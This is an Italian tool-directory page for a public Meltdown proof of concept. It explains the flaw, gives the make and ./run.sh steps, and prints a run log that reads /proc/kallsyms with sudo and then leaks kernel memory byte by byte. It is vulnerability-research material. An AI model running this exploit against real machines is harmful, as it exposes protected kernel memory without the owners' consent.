Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
meltdown-exploit — Meltdown Exploit PoC | Kitploit
Strumenti/GitHubGitHub/paboldin/meltdown-exploit
Memory ForensicsAnalisi delle VulnerabilitàExploitBinary Exploitation
GitHubpaboldin/meltdown-exploit

meltdown-exploit

Meltdown Exploit PoC

Vedi Repository
9492638 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

MELTDOWN EXPLOIT POC

Le ottimizzazioni speculative eseguono codice in modo non sicuro lasciando tracce di dati nella microarchitettura come la cache.

Lipp et al. hanno pubblicato il loro codice il 2018-01-09 su https://github.com/IAIK/meltdown. Consulta il loro articolo per i dettagli: https://meltdownattack.com/meltdown.pdf.

Al momento è possibile solo dumpare linux_proc_banner, poiché richiede che la memoria a cui si accede sia nella cache e linux_proc_banner viene memorizzato nella cache ad ogni lettura da /proc/version. Potrebbe funzionare con prefetch. Funziona con sched_yield.

Compila con make, esegui con ./run.sh.

Non è ancora in grado di sconfiggere KASLR, quindi potresti dover inserire la password per trovare linux_proc_banner in /proc/kallsyms (o farlo manualmente).

L'approccio Flush+Reload e array target è tratto dal paper su Spectre https://spectreattack.com/spectre.pdf implementato seguendo indizi da https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/.

Il vaso di Pandora è aperto.

Dai un'occhiata allo sfruttamento completo che funziona con la versione di IAIK sulla mia macchina.

Result:

root@kitploit:~
$ make
cc -O2 -msse2   -c -o meltdown.o meltdown.c
cc   meltdown.o   -o meltdown
$ ./run.sh 
looking for linux_proc_banner in /proc/kallsyms
protected. requires root
+ find_linux_proc_banner /proc/kallsyms sudo
+ sudo awk 
	/linux_proc_banner/ {
		if (strtonum("0x"$1))
			print $1;
		exit 0;
	} /proc/kallsyms
+ linux_proc_banner=ffffffffa3e000a0
+ set +x
cached = 29, uncached = 271, threshold 88
read ffffffffa3e000a0 = 25 %
read ffffffffa3e000a1 = 73 s
read ffffffffa3e000a2 = 20  
read ffffffffa3e000a3 = 76 v
read ffffffffa3e000a4 = 65 e
read ffffffffa3e000a5 = 72 r
read ffffffffa3e000a6 = 73 s
read ffffffffa3e000a7 = 69 i
read ffffffffa3e000a8 = 6f o
read ffffffffa3e000a9 = 6e n
read ffffffffa3e000aa = 20  
read ffffffffa3e000ab = 25 %
read ffffffffa3e000ac = 73 s
read ffffffffa3e000ad = 20  
read ffffffffa3e000ae = 28 (
read ffffffffa3e000af = 62 b
read ffffffffa3e000b0 = 75 u
read ffffffffa3e000b1 = 69 i
read ffffffffa3e000b2 = 6c l
read ffffffffa3e000b3 = 64 d
read ffffffffa3e000b4 = 64 d
read ffffffffa3e000b5 = 40 @
VULNERABLE
VULNERABLE ON
4.10.0-42-generic #46~16.04.1-Ubuntu SMP Mon Dec 4 15:57:59 UTC 2017 x86_64
processor	: 0
vendor_id	: GenuineIntel
cpu family	: 6
model		: 158
model name	: Intel(R) Core(TM) i7-7700HQ CPU @ 2.80GHz
stepping	: 9
microcode	: 0x5e
cpu MHz		: 3499.316
cache size	: 6144 KB
physical id	: 0

Funziona su

L'elenco delle CPU/Kernel vulnerabili è stato spostato qui: https://github.com/paboldin/meltdown-exploit/issues/19

L'elenco delle CPU/Kernel invulnerabili è stato spostato qui: https://github.com/paboldin/meltdown-exploit/issues/22

Scarica lo strumento